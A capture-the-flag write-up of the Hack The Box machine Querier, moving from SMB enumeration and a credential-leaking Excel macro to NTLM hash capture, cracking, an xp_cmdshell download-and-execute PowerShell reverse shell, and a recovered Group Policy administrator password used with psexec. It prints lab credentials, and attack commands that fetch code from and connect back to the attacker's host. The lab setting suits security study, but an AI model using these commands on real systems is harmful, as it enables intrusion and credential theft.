Querier

Enumeration
Starting off with a port scan.
root@redteam:~/htb/querier# nmap -n -T4 -sV -sC -oN defaultscan 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 21:40 CEST
Host is up (0.022s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-17T04:16:07
| Not valid after:  2049-06-17T04:16:07
| MD5:   408c 1f69 ce32 03b4 6243 3836 e9b8 67ce
|_SHA-1: dff4 ce7d 4050 80b9 422b 66b4 ef66 1972 9a4b 2fe2
|_ssl-date: 2019-06-22T18:25:56+00:00; -1h14m27s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h14m27s, deviation: 0s, median: -1h14m27s
| ms-sql-info:
|   10.10.10.125:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-06-22 20:26:00
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 21:40
Completed NSE at 21:40, 0.00s elapsed
Initiating NSE at 21:40
Completed NSE at 21:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds
           Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.056KB)
No web server, only SMB (139/445) and MSSQL (1433), both of which normally need credentials. Two details worth keeping in mind: the box is a domain member (HTB.LOCAL) running SQL Server 2017 (build 14.00.1000), and SMB signing is enabled but not required.
SMB
root@redteam:~/htb/querier# smbmap -H 10.10.10.125 -u "guest"
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445	Name: 10.10.10.125
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	IPC$                                              	READ ONLY
	Reports                                           	READ ONLY
The Reports share is not a default share, and the guest account can read it.
root@redteam:~/htb/querier# smbclient //10.10.10.125/Reports -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jan 29 00:23:48 2019
  ..                                  D        0  Tue Jan 29 00:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 23:21:34 2019
Looks like just one Excel file.
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (86.5 KiloBytes/sec) (average 86.5 KiloBytes/sec)
EXCEL
An .xlsm is a macro-enabled OpenXML workbook: the VBA sits in an OLE container (xl/vbaProject.bin) inside the zip. To check such a file on Kali there are several tools, most of them from oletools. This site has a nice overview.
root@redteam:~/htb/querier# olevba 'Currency Volume Report.xlsm'
olevba 0.51 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OpX:M-S-H--- Currency Volume Report.xlsm
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

' MsgBox "connection successful"
'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Open        | May open a file                         |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+
The macro opens an ADO connection to the SQL Server on QUERIER (database volume), and the connection string carries the credentials in clear text: Uid=reporting, Pwd=PcwTWTHRwryjc$c6. Anyone who can read the share can read them, which is exactly what just happened.
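The triage step above can be scripted. What follows is an added example written for this page (not code from the original post or from oletools): it scans macro text such as olevba's dump for VBA string literals that parse as ODBC/ADO connection strings, splitting "key=value;key={value}" pairs while honouring braced values that may themselves contain semicolons, and reports the credential fields. MACRO_SOURCE is the macro body olevba printed above; the key lists are my own choice.

```python
"""Pull hard-coded database credentials out of macro source such as olevba's dump.

Added example for this write-up, not code from the original post or from oletools.
MACRO_SOURCE is the macro body olevba printed above; the parser generalises to any
ODBC/ADO style "key=value;key={value}" string found in a VBA string literal.
"""
import re

MACRO_SOURCE = r'''
' macro to pull data for client volume reports
Private Sub Connect()
    Dim conn As ADODB.Connection
    Dim rs As ADODB.Recordset
    Set conn = New ADODB.Connection
    conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
    conn.ConnectionTimeout = 10
    conn.Open
    If conn.State = adStateOpen Then
        'Set rs = conn.Execute("SELECT * @@version;")
        Set rs = conn.Execute("SELECT * FROM volume;")
        Sheets(1).Range("A1").CopyFromRecordset rs
        rs.Close
    End If
End Sub
'''

# VBA string literal; a doubled quote inside the literal is an escaped quote.
STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')
# Keys that mark a literal as a connection string, and keys that hold credentials
# (assumed lists for this example; extend them for other providers).
CONNECTION_KEYS = {"driver", "provider", "server", "data source"}
SECRET_KEYS = {"uid", "user id", "pwd", "password"}


def parse_connection_string(s):
    """Split 'k=v;k={v;with;semicolons}' into a dict with lower-cased keys."""
    fields, pos = {}, 0
    while pos < len(s):
        eq = s.find("=", pos)
        if eq < 0:
            break
        key = s[pos:eq].strip().lower()
        pos = eq + 1
        if s.startswith("{", pos):            # braced values may contain ';'
            end = s.find("}", pos)
            end = len(s) if end < 0 else end
            fields[key] = s[pos + 1:end]
            pos = end + 1
        else:
            end = s.find(";", pos)
            end = len(s) if end < 0 else end
            fields[key] = s[pos:end].strip()
            pos = end
        semi = s.find(";", pos)               # skip to the next pair
        pos = len(s) if semi < 0 else semi + 1
    return fields


def find_connection_strings(macro_text):
    """Every string literal that parses as a connection string, as a list of dicts."""
    found = []
    for literal in STRING_LITERAL.findall(macro_text):
        literal = literal.replace('""', '"')
        if "=" not in literal:
            continue
        fields = parse_connection_string(literal)
        if fields.keys() & CONNECTION_KEYS:
            found.append(fields)
    return found


def embedded_secrets(macro_text):
    """Just the credential fields, plus the server they belong to, for reporting."""
    return [{k: v for k, v in f.items() if k in SECRET_KEYS or k == "server"}
            for f in find_connection_strings(macro_text)]


if __name__ == "__main__":
    for hit in embedded_secrets(MACRO_SOURCE):
        print(hit)
```

Feed it the output of `olevba --decode` for a whole directory of documents and you get a quick list of which files leak which database logins; the brace handling matters because `Driver={SQL Server}` style values are common in ODBC strings.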
MSSQL
Impacket ships mssqlclient.py, which speaks TDS directly and can log in with the credentials from the macro. Note that the login lands straight in the volume database.
root@redteam:~/htb/querier# mssqlclient.py reporting@10.10.10.125 -windows-auth
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
SQL> enable_xp_cmdshell
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
The reporting login is not a sysadmin, so it cannot run sp_configure/RECONFIGURE to enable xp_cmdshell. What it can still do is call xp_dirtree, which is executable by every login by default and accepts a UNC path: when it is pointed at a remote share, the SQL Server service account authenticates to that share with NTLM. After browsing the internet I found a page with some nice information on this.
First, start Responder on the VPN interface so that it answers the SMB connection and records the NTLMv2 challenge/response.
root@redteam:~/htb/querier# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CRTL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.8]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Listening for events...
Then call xp_dirtree with a UNC path that points at my IP.
SQL> xp_dirtree "\\10.10.14.8\test"
subdirectory   depth
------------   -----
The service account connects to Responder's SMB listener, and Responder captures its NetNTLMv2 response.
[SMBv2] NTLMv2-SSP Client   : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash     : mssql-svc::QUERIER:adc9568c4b8fb9d4:D580EC639E550755311B0DA5528DA48D:0101000000000000C0653150DE09D201110D34E634CC0298000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000FEC94F05C7300E09E90D318168A2191C7763D53628DD63CA3EFA731E7AC45A780A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003800000000000000000000000000
CRACKING THE HASH
Because I run my Kali in a VM I use John instead of Hashcat.
root@redteam:~/htb/querier/hash# john --wordlist=/usr/share/wordlists/rockyou.txt --format=netntlmv2 hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568     (mssql-svc)
1g 0:00:00:11 DONE (2019-06-22 22:46) 0.08960g/s 802775p/s 802775c/s 802775C/s correforenz..corococo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
There is the password: corporate568.
root@redteam:~/htb/querier# mssqlclient.py mssql-svc@10.10.10.125 -windows-auth
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
The previous user didn't have permission. Let's see if it is different with this one.
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL>
That worked, so mssql-svc is a sysadmin on the instance and xp_cmdshell is now enabled. Every command it runs executes as the SQL Server service account.
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
querier\mssql-svc
NULL
Getting some system information.
SQL> xp_cmdshell systeminfo
output
--------------------------------------------------------------------------------
NULL
Host Name:                 QUERIER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-00521-62775-AA073
Original Install Date:     1/28/2019, 11:16:50 PM
System Boot Time:          6/17/2019, 5:15:18 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.7581552.B64.1801142334, 1/14/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 812 MB
Virtual Memory: Max Size:  3,199 MB
Virtual Memory: Available: 1,879 MB
Virtual Memory: In Use:    1,320 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB.LOCAL
Logon Server:              N/A
Hotfix(s):                 6 Hotfix(s) Installed.
                           [01]: KB4481031
                           [02]: KB4462930
                           [03]: KB4470788
                           [04]: KB4480056
                           [05]: KB4480979
                           [06]: KB4476976
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.125
                                 [02]: fe80::ed0c:14f9:fdc3:63ca
                                 [03]: dead:beef::ed0c:14f9:fdc3:63ca
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
NULL
REVERSE SHELL
Time to get a reverse shell, which gives more freedom on this box than one-off xp_cmdshell calls. Kali ships the Nishang collection under /usr/share/nishang; from there I copy the PowerShell TCP reverse shell to my working folder.
root@redteam:~/htb/querier/shell# cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
Then add a line to the bottom of the file so the function is called as soon as the script is loaded: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 9999
Now to get this file onto the remote system: on my local machine I start a Python web server on port 80.
root@redteam:~/htb/querier/shell# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
On this site there is a one-liner that downloads the script and runs it in memory through xp_cmdshell.
SQL> xp_cmdshell powershell iex(New-Object System.Net.WebClient).DownloadString(\"http://10.10.14.8/shell.ps1\")
root@redteam:~/htb/querier/shell# nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.125] 49702
Windows PowerShell running as user mssql-svc on QUERIER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>
PRIVILEGE ESCALATION
On the Desktop of this user is the first flag.
PS C:\users\mssql-svc\desktop> dir

    Directory: C:\users\mssql-svc\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/28/2019  12:08 AM             33 user.txt
On this GitHub page (PowerSploit) there are some excellent PowerShell scripts. One of them is PowerUp.ps1, which does for Windows what LinEnum.sh does for Linux: it enumerates the common local privilege escalation paths.
PS C:\users\mssql-svc\desktop> IEX(New-Object System.Net.WebClient).DownloadString("http://10.10.14.8/PowerUp.ps1")
PS C:\users\mssql-svc\desktop> Invoke-AllChecks
The script finds several things; one of them is a plaintext password recovered from a cached Group Policy Preferences file. The cpassword in Groups.xml is only AES-encrypted with a key Microsoft published in its own documentation (the MS14-025 issue), so PowerUp decrypts it on the spot.
[*] Checking for cached Group Policy Preferences .xml files....

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {[SPOILER]}
File      : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
root@redteam:~/htb/querier/shell# smbmap -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!' -H 10.10.10.125 -d QUERIER
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445	Name: 10.10.10.125
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	READ, WRITE
	C$                                                	READ, WRITE
	IPC$                                              	READ ONLY
	Reports                                           	READ ONLY
With this account I have read and write access to ADMIN$ and C$, which is all psexec.py needs: it uploads a service binary to ADMIN$, registers it through the service manager and starts it, which yields a shell as SYSTEM.
root@redteam:~/htb/querier/shell# psexec.py administrator@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file hrRThQSF.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service tszF on 10.10.10.125.....
[*] Starting service tszF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
Now for the final flag.
c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is FE98-F373

 Directory of c:\Users\Administrator\Desktop

01/29/2019  01:04 AM    <DIR>          .
01/29/2019  01:04 AM    <DIR>          ..
01/28/2019  01:08 AM                33 root.txt
               1 File(s)             33 bytes
               2 Dir(s)   6,171,058,176 bytes free
And there we have it. A really nice box with some challenges. And finally a Windows machine for a change.